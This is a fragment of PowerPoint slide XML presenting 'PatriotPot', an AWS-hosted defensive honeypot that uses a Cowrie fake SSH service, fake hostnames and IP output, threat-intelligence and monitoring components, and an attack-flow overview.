                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Layer 7 (Application Layer) - Service Differentiation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="5388650"/>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Real SSH Service: Actual EC2 filesystem, real processes, real AWS internal IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="5668923"/>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Fake SSH Service: Fake filesystem, simulated processes, fake internal IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774502" y="6201847"/>
            <a:ext cx="13081397" cy="1419582"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15199"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="12700" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789742" y="6217087"/>
            <a:ext cx="575310" cy="1389102"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34325"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="12700" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28"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5716" y="6803708"/>
            <a:ext cx="215741" cy="215741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="6360914"/>
            <a:ext cx="1839158" cy="224671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Key Deception Points</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="6671786"/>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IP Address Spoofing: Cowrie displays fake ifconfig output</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="6952059"/>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Hostname Deception: Real (ip-10-0-1-45.ec2.internal) vs Fake (web-server-01)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="7232332"/>
            <a:ext cx="12187952" cy="230029"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Multi-layer deception across OSI layers 3-7</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27365"/>
            <a:ext cx="5514618" cy="460772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Complete System Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="1582936"/>
            <a:ext cx="8442960" cy="4474726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6223516"/>
            <a:ext cx="13042821" cy="1178719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>This comprehensive system architecture diagram illustrates the PatriotPot honeypot infrastructure, built primarily on AWS. It integrates several key components to detect, analyze, and respond to threats. The core AWS components include EC2 instances for hosting the honeypot services, S3 buckets for data storage, and various networking services like VPCs and security groups to isolate and protect the environment. The threat intelligence stack gathers, correlates, and enriches data from multiple sources, providing context to detected attacks. Monitoring systems are crucial for continuous logging, collecting performance metrics, and triggering alerts for suspicious activities. All these components are interconnected, ensuring that attack data flows seamlessly from the honeypot to the intelligence and monitoring systems for real-time analysis and response by the security team.</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5813" y="617458"/>
            <a:ext cx="6268760" cy="526256"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Complete Attack Flow Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785812" y="1585674"/>
            <a:ext cx="4094531" cy="5175171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4160758" y="1547693"/>
            <a:ext cx="9691330" cy="269319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785813" y="7139702"/>
            <a:ext cx="13058775" cy="538639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>This comprehensive sequence diagram shows the complete flow from attacker connection through threat intelligence processing, AI troll engagement, team notifications, and data archiving.</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2928</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>291</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DM Sans</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>DM Sans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Kevin Landry</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-26T22:38:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-26T22:42:03Z</dcterms:modified>
</cp:coreProperties>
</file>